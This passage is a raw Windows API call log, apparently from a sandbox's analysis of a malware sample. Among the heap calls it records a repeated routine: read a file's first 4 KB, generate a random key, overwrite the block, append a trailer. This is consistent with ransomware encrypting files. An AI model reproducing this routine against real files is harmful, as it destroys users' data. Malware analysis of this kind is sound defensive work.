[0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.172] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.172] GetProcessHeap () returned 0x4f10000 [0087.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.173] GetProcessHeap () returned 0x4f10000 [0087.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.174] GetProcessHeap () returned 0x4f10000 [0087.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.174] GetProcessHeap () returned 0x4f10000 [0087.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.174] GetProcessHeap () returned 0x4f10000 [0087.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.174] GetProcessHeap () returned 0x4f10000 [0087.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.174] GetProcessHeap () returned 0x4f10000 [0087.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.174] GetProcessHeap () returned 0x4f10000 [0087.174] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0087.174] GetProcessHeap () returned 0x4f10000 [0087.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.174] GetProcessHeap () returned 0x4f10000 [0087.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0087.174] GetProcessHeap () returned 0x4f10000 [0087.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0087.174] GetProcessHeap () returned 0x4f10000 [0087.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0087.174] GetProcessHeap () returned 0x4f10000 [0087.174] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0087.174] SetFilePointerEx (in: hFile=0xa18, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.174] WriteFile (in: hFile=0xa18, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0087.174] WriteFile (in: hFile=0xa18, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0087.175] GetProcessHeap () returned 0x4f10000 [0087.175] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0087.175] GetProcessHeap () returned 0x4f10000 [0087.175] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0087.175] GetProcessHeap () returned 0x4f10000 [0087.175] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0087.175] CloseHandle (hObject=0xa18) returned 1 [0087.176] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 168 [0087.176] SetFilePointerEx (in: hFile=0xa1c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.176] ReadFile (in: hFile=0xa1c, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0087.176] SetFilePointerEx (in: hFile=0xa1c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.176] GetProcessHeap () returned 0x4f10000 [0087.176] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0087.176] GetProcessHeap () returned 0x4f10000 [0087.176] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0087.176] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0087.176] GetProcessHeap () returned 0x4f10000 [0087.176] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0087.176] ReadFile (in: hFile=0xa1c, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0087.246] SetFilePointerEx (in: hFile=0xa1c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.246] WriteFile (in: hFile=0xa1c, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.247] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.247] GetProcessHeap () returned 0x4f10000 [0087.248] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.248] GetProcessHeap () returned 0x4f10000 [0087.248] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.249] GetProcessHeap () returned 0x4f10000 [0087.249] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.250] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.250] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.250] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.250] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.250] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.250] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.250] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.250] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.250] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.250] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.250] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.250] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.250] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.250] GetProcessHeap () returned 0x4f10000 [0087.251] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.251] GetProcessHeap () returned 0x4f10000 [0087.251] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.251] GetProcessHeap () returned 0x4f10000 [0087.251] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0087.251] GetProcessHeap () returned 0x4f10000 [0087.251] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.251] GetProcessHeap () returned 0x4f10000 [0087.251] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0087.251] GetProcessHeap () returned 0x4f10000 [0087.251] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0087.251] GetProcessHeap () returned 0x4f10000 [0087.251] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0087.251] GetProcessHeap () returned 0x4f10000 [0087.251] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0087.251] GetProcessHeap () returned 0x4f10000 [0087.251] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0087.251] GetProcessHeap () returned 0x4f10000 [0087.251] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0087.251] GetProcessHeap () returned 0x4f10000 [0087.251] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0087.251] GetProcessHeap () returned 0x4f10000 [0087.251] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0087.251] SetFilePointerEx (in: hFile=0xa1c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.251] WriteFile (in: hFile=0xa1c, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0087.251] WriteFile (in: hFile=0xa1c, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0087.252] GetProcessHeap () returned 0x4f10000 [0087.252] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0087.252] GetProcessHeap () returned 0x4f10000 [0087.252] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0087.252] GetProcessHeap () returned 0x4f10000 [0087.252] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0087.252] CloseHandle (hObject=0xa1c) returned 1 [0087.253] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 169 [0087.253] SetFilePointerEx (in: hFile=0xa20, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.253] ReadFile (in: hFile=0xa20, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0087.253] SetFilePointerEx (in: hFile=0xa20, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.253] GetProcessHeap () returned 0x4f10000 [0087.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0087.253] GetProcessHeap () returned 0x4f10000 [0087.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0087.253] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0087.253] GetProcessHeap () returned 0x4f10000 [0087.253] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0087.253] ReadFile (in: hFile=0xa20, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0087.488] SetFilePointerEx (in: hFile=0xa20, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0087.488] WriteFile (in: hFile=0xa20, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0087.489] GetProcessHeap () returned 0x4f10000 [0087.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0087.489] GetProcessHeap () returned 0x4f10000 [0087.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0087.489] GetProcessHeap () returned 0x4f10000 [0087.489] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0087.489] GetProcessHeap () returned 0x4f10000 [0087.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0087.489] GetProcessHeap () returned 0x4f10000 [0087.489] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0087.489] GetProcessHeap () returned 0x4f10000 [0087.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0087.489] GetProcessHeap () returned 0x4f10000 [0087.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.489] GetProcessHeap () returned 0x4f10000 [0087.489] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.489] GetProcessHeap () returned 0x4f10000 [0087.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0087.489] GetProcessHeap () returned 0x4f10000 [0087.489] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0087.489] GetProcessHeap () returned 0x4f10000 [0087.489] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0087.588] GetProcessHeap () returned 0x4f10000 [0087.588] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0087.588] GetProcessHeap () returned 0x4f10000 [0087.588] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, 